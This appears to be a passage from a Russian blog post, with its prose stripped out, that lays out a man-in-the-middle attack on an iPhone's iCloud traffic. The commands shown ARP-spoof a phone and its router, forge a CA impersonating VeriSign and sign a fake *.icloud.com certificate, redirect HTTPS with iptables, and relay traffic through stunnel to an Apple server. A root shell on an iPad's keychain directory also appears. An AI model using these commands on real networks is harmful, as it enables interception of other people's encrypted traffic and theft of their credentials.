sysctl -w net.ipv4.ip_forward=1
#
echo 1 > /proc/sys/net/ipv4/ip_forward
#192.168.1.101 - iphone
#192.168.1.101 -
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.101
#
iPad:/private/var/Keychains root# uname -a
Darwin iPad 10.4.0 Darwin Kernel Version 10.4.0: Wed Oct 20 20:14:45 PDT 2010; root:xnu-1504.58.28~3/RELEASE_ARM_S5L8930X iPad1,1 arm K48AP Darwin
iPad:/private/var/Keychains root# pwd
/private/var/Keychains
iPad:/private/var/Keychains root# ls -liahs keychain-2.db
147473 112K -rw------- 1 _securityd wheel 112K Dec 19 00:11 keychain-2.db
( , )
, , .
[20:36:02 dev@sandbox:~/CA]$openssl req -new -x509 -days 3650 -extensions v3_ca -keyout private/cakey.pem -out cacert.pem
Generating a 1024 bit RSA private key
.........................................................................++++++
.........................................++++++
writing new private key to 'private/cakey.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:VeriSign
Locality Name (eg, city) []:VeriSign Trust Network
Organization Name (eg, company) [Internet Widgits Pty Ltd]:VeriSign Inc
Organizational Unit Name (eg, section) []:Terms of use at www.verisign.com/rpa (c)09
Common Name (eg, YOUR name) []:VeriSign Class 3 Secure Server CA - G2
Email Address []:
[21:10:52 dev@sandbox:~/CA]$openssl req -new -nodes -out my_icloud_apple_req.pem -keyout my_icloud_apple_key.pem
Generating a 1024 bit RSA private key
......++++++
.++++++
writing new private key to 'my_icloud_apple_key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:california
Locality Name (eg, city) []:cupertino
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Apple Inc
Organizational Unit Name (eg, section) []:iTMS
Common Name (eg, YOUR name) []:*.icloud.com
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
[22:42:33 dev@sandbox:~/CA]$openssl x509 -req -days 365 -in my_icloud_apple_req.pem -CA cacert.pem -CAkey private/cakey.pem -set_serial 01 -out my_icloud_apple_cert.pem
Signature ok
subject=/C=US/ST=california/L=cupertino/O=Apple Inc/OU=iTMS/CN=*.icloud.com
Getting CA Private Key
Enter pass phrase for private/cakey.pem:
[22:44:20 dev@sandbox:~/CA]$
# appstore
iptables -A FORWARD -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8443
; PID is created inside the chroot jail
pid = /stunnel.pid
; Debugging stuff (may useful for troubleshooting)
debug = 7
output = /var/log/stunnel.log
;
cert = /home/dev/CA/my_icloud_apple_cert.pem
key = /home/dev/CA/my_icloud_apple_key.pem
; Disable support for insecure SSLv2 protocol
options = NO_SSLv2
; https 8443 9000
[https_s]
accept = 0.0.0.0:8443
connect = 0.0.0.0:9000
; 9500 , https icloud
[https_c]
client = yes
accept = 0.0.0.0:9500
connect = 17.172.208.53:443
Source: https://habr.com/ru/post/135250/